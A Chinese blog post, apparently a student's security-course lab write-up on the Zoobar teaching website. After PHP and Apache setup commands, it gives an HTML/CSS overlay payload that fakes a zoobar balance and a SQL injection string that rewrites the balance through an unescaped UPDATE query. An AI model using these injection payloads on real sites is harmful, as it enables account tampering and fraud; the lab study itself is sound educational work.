資訊保安實踐Lab2-CSS

貓耳柯基腿發表於2020-12-27

資訊保安實踐Lab2-CSS

Ubuntu20.04 安裝 php5.6 ,php5.6-mysql,apache2,mysql5.7

安裝php5.6,php5.6-mysql,apache2

sudo apt-get install -y language-pack-en-base

sudo LC_ALL=en_US.UTF-8 add-apt-repository ppa:ondrej/php

sudo add-apt-repository ppa:ondrej/php

sudo apt-get update

sudo apt-get install php5.6

sudo apt-get install php5.6-mysql

sudo apt-get apache2

sudo a2dismod php7.4

sudo a2enmod php5.6

sudo service apache2 restart

安裝mysql5.7

https://blog.csdn.net/Deadly_97/article/details/111675825

問題1

問題2:Zoobar網站尋找漏洞

Manage your profile in the zoobar website, make your zoobars appear more than you really own. That is, after you modify your profile, when others or yourself look up your profile, they will see more zoobars than you actually own.

方法一:利用css

  1. 在a使用者的profile中輸入

    <img src="http://106.13.136.87:8080/100.png" style="position:relative;top:-55px;right:-63px;width:34px;height:21px"/>
    
  2. 然後b使用者在User中輸入使用者名稱a,就會看到a有100個zoobars,其實a並沒有100個

方法二:sql注入

  1. 原始碼中,處理$profile引數sql語句如下:

    $sql = "UPDATE Person SET Profile='$profile' ".
               "WHERE PersonID=$user->id";
    
  2. 假設第一個使用者a在profile中輸入

    ',Zoobars=9999,Profile='Welcome to my profile!
    
  3. 最後執行的sql如下

    update Person set Profile='',Zoobars=9999,Profile='Welcome to my profile!' where PeronID=1;
    
  4. 最後再去查a的餘額就有9999個zoobars

相關文章